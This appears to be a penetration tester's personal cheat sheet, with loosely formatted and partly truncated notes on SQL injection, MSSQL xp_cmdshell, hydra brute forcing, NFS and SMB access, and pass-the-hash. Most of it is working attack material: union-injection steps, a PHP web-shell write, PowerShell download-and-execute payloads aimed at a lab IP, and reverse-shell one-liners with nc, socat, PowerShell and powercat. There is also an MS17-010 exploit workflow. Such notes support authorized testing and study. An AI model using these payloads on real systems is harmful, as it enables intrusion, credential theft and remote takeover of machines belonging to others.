When modifying web exploits, there are several key questions we generally need to ask while approaching the code:
- Does it initiate an HTTP or HTTPS connection?
- Does it access a web application specific path or route?
- Does the exploit leverage a pre-authentication vulnerability?
- If not, how does the exploit authenticate to the web application?
- How are the GET or POST requests crafted to trigger and exploit the vulnerability?
- Does it rely on default application settings (such as the web path of the application) that may have been changed after installation?
- Will oddities such as self-signed certificates disrupt the exploit?
- Use
‘
and“
to look for possible errors - use
#
and--
for comments after the injection. (After the ``-- ``` a space is required_- If
--
in url the add something behind it so the space doesn't get truncated. For example-- \\
- If
- If returning multiple rows gives errors use
LIMIT 1
in the query - use
ORDER BY
to find the amount of columns. Increment it by 1 till no output is shown. - use
load_file('C:/Windows/System32/drivers/etc/hosts')
to load files instead of database data. - use
"<?php echo shell_exec($_GET['cmd']);?>" into OUTFILE '<PATH TO WEBROOT>/backdoor.php'
to create a simple php backdoor.
- https://www.hackingarticles.in/manual-sql-injection-exploitation-step-step/
- https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection
- Find the SQL injecton
- Use
‘
and“
to look for possible errors. - Vunerable value for example is
artist=1
- Use
- Find the amount of columns
- use
artist=1 ORDER BY 1
. Increment it by 1 till no output or error is given. Ifartist=1 ORDER BY 4
gives an error, the amount of columns is 3.
- use
- Use a union based SQL injection
- use
artist=1 union select 1,2,3
(amount of columns). If no other output is given:- use wrong output
artist=-1 union select 1,2,3
- If its a string use
artist=-1 union select NULL,NULL,NULL
- use wrong output
- use
- Fetch the name of the database and version/current user
artist=-1 union select 1,database(),3
-1 union select 1,version(),current_user()
- Fetch the table names inside the database
- Retrieve all table names
artist=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()
- Get first table name (Limited by first because of the
limit 0,1
)artist=-1 union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 0,1
- Get the second table name (Limited by second because of the
limit 1,1
)artist=-1 union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 1,1
- Get the rest of the table names
- Retrieve all table names
- Retrieve columns names
artist=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='<TABLE>'
- Get data out of the columns
artist=-1 union select 1,group_concat(<COLUMN>),3 from <TABLE>
- Use the
--batch
command to default answer the questions - Use the
--wizzard
flag for easy mode - Use the
--os-shell
flag for easy shell
sqlmap -r <BURP REQUEST>
sqlmap -r <BURP REQUEST> --banner
sqlmap -r <BURP REQUEST> --dbs
sqlmap -r <BURP REQUEST> --D <DATABASE> --tables
sqlmap -r <BURP REQUEST> --D <DATABASE> -T <TABLE> --columns
sqlmap -r <BURP REQUEST> --D <DATABASE> -T <TABLE> -C <COLUMN>,<COLUMN> --dump
sqlmap -r <BURP REQUEST> --dump
sqlmap -r
show grants;
show variables;
show databases;
use <DATABASE>;
show tables;
describe <TABLE>;
SELECT * FROM <TABLE>;
mssql-cli -S 10.11.1.31 -U sa -P 'poiuytrewq'
EXECUTE sp_configure 'show advanced options', 1;
RECONFIGURE;
EXECUTE sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
xp_cmdshell 'whoami'
a ') EXEC xp_cmdshell 'powershell.exe iex (New-Object Net.WebClient).DownloadString(''http://10.10.14.143:8090/amsi.txt''); iex (New-Object Net.WebClient).DownloadString(''http://10.10.14.143:8090/Invoke-PowerShellTcp2.ps1'')'; --
- Is the webserver running ISS, PHP? What is it running
- ISS = .asp, .aspx
- PHP = .php
- Java = .jsp
/opt/SecLists/Discovery/Web-Content/web-extensions.txt
- Check if login is allowed as anonymous:anonymous.
nc -nvC <IP> <PORT>
USER <USERNAME>
PASS <PASSWORD>
LIST
RETR 1
RETR 2
evil-winrm -u <USER> -p <PASS> -i <IP>
https://github.com/danielmiessler/SecLists
hydra -L <USERNAMEFILE> -P <PASSWORDFILE> -t 24 ftp://<IP>:<PORT>
hydra -L <USERNAMEFILE> -P <PASSWORDFILE> -t 24 ssh://<IP>:<PORT>
Login using Burp or check in developers tools to check the request for the required information! You need to get the username/password/# parameter and the error message!
https://redteamtutorials.com/2018/10/25/hydra-brute-force-https/
hydra -L <USERNAMEFILE> -P <PASSWORDFILE> <IP> http-post-form "<LOGINPAGE>:<COOKIES FROM BURP AND SET ^USER^ AND ^PASS^>:<ERROR MESSAGE FAILED LOGIN>"
#EXAMPLE hydra -L usernames.txt -P passwords.txt 192.168.2.62 http-post-form "/dvwa/#.php:username=^USER^&password=^PASS^&Login=Login:Login Failed"
#EXAMPLE hydra -l admin -P /opt/SecLists/Passwords/xato-net-10-million-passwords-100.txt 10.10.175.0 http-post-form '/Account/#.aspx?ReturnURL=/admin:__VIEWSTATE=u8hdjDohYmqfI8o0z7Cev4b1u0jLmv9dNA9NS95wDsZeMYw6zBFeyhiLx1QuOsZ%2FXV%2Fo%2BrCdXSC4Y7%2FueaRnmboaQQ9KZQWLME84zysowmYTAW8Kea1%2Bp7phoEwMiICbLwPPteDEYl7z6nobm8x1Mb2hMDiTpDJhracgmTh%2BJwP1Rqqt&__EVENTVALIDATION=QJmkftZnDEcQIPsstxYKnQBDsulZLsB0kmrbMa4BPzAc%2FMEDChrOmztni5OWBx83r2xGNndCAgw6wJ%2F%2FoAzYtZEcyRWC%2FaPyUR5iWSO0V8%2FIodobow1OxiuoD9uZVnVO8tcQZr3NWYjFcOVxYg5WAWvPyezvfcBk2oxUdZwsutPATiKB&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:failed'
cewl <URL> -m <MIN CHARS> -w <FILE>.txt
hashid <HAS>
hash-identiefier
Unshadow <PASSWD FILE> <SHADOW FILE> > unshadow.txt
Portmapper and RPCBind run on TCP port 111
rpcinfo <IP>
sudo nmap -sSUC -p111 <IP> --script *nfs*
showmount -e <IP>
sudo mount -o nolock <IP>:/<SHARE> <MOUNT LOCATION>
sudo mount -t cifs -o port=<PORT> //<IP>/<SHARE> -o username=<USERNAME>,password=<PASSWORD> /mnt/<FOLDER>
If a file found which we want to access but don’t have permissions. Make a user with the same username and change the UUID, change to the user so we can access the file.
sudo adduser pwn
sudo vim /etc/passwd
- msfvenom https://netsec.ws/?p=331
sudo nc -nlvp <PORT>
sudo socat -d -d TCP4-LISTEN:<PORT> STDOUT
msfconsole
use multi/handler
set payload <PAYLOAD>
run
. ./powercat.ps1
powercat -l -v -p 10000
- Generator tool https://github.com/mthbernardes/rsg
nc -nv <IP> <PORT> -e /bin/bash
socat TCP4:<IP>:<PORT> EXEC:/bin/bash
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('<IP>',<PORT>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i =$stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
powershell.exe iex (iwr http://<IP>/Invoke-PowerShellTcp.ps1 -usebasicparsing);Invoke-PowerShellTcp -Reverse -IPAddress <IP> -Port <PORT>
powershell iex (New-Object Net.WebClient).DownloadString('http://<IP>/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress <IP> -Port <PORT>
powercat -c <IP> -p <PORT> -e cmd.exe
nc -nlvp <PORT>
powershell -c "$listener = New-Object System.Net.Sockets.TcpListener('<IP>',<PORT>);$listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'P
powercat -l -p <PORT> -e cmd.exe
python -c 'import pty; pty.spawn("/bin/sh")'
echo os.system('/bin/bash')
/bin/sh -i
perl —e 'exec "/bin/sh";'
perl: exec "/bin/sh";
ruby: exec "/bin/sh"
python3 -c 'import pty;pty.spawn("/bin/bash")'
Ctrl + Z
stty raw -echo; fg
<enter> x2
export TERM=xterm-256color
python3 -c 'import pty;pty.spawn("/bin/bash")'
Ctrl + Z
stty raw -echo
fg
fg
export TERM=xterm-256color
stty rows 46 cols 140
- In your active shell press
bg
to send your nc session to background - Enter
stty raw -echo
- Enter
fg
to bring your nc session to foreground - ```export TERM=xterm-256color``
git clone https://github.com/helviojunior/MS17-010
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> EXITFUNC=thread -f exe -a x86 --platform windows -o ms17-010.exe
nc -lnvp <PORT>
python send_and_execute.py <TARGET IP> ms17-010.exe
<?php
// Return the listing of the directory where the file runs (Windows)
system("dir");
?>
<?php
// Executes but returns nothing
exec("ls -la");
?>
<?php
// Executes, returns the entire output as a string
echo shell_exec("ls -la");
?>
<?php
// Executes, returns output in raw format
passsthru("ls -la");
?>
https://gracefulsecurity.com/path-traversal-cheat-sheet-windows/
First is a empty LM HASH, last one should work as well.
pth-winexe -U <USERNAME>%aad3b435b51404eeaad3b435b51404ee:<NTLM HASH> //<IP> cmd
pth-winexe -U <USERNAME>%<LM HASH>:<NTLM HASH> //<IP> cmd
pth-winexe -U <USERNAME>%:<NTLM HASH> //<IP> cmd
https://www.exploit-db.com/exploits/46249
Start without tmux a /bin/bash shell
nc -lvp <PORT>
python -c 'import pty;pty.spawn("/bin/bash")'
Ctrl+Z
stty raw -echo
fg
export TERM=screen